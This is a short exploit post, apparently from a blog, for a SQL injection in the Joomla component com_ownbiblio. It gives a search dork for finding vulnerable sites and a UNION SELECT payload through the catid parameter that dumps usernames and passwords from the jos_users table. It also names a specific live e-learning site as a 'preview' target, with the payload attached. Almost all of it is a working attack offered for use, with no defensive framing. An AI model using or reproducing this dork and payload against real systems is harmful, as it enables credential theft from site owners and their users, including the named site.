[~] DORK: inurl:"com_ownbiblio" catalogue
########################################
[~] Exploit: /index.php?option=com_ownbiblio&view=catalogue&catid=[SQL]
:
[~] Example: /index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
########################################
preview:http://e-learning.cesga.es//index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
image:




Tidak ada komentar:
Posting Komentar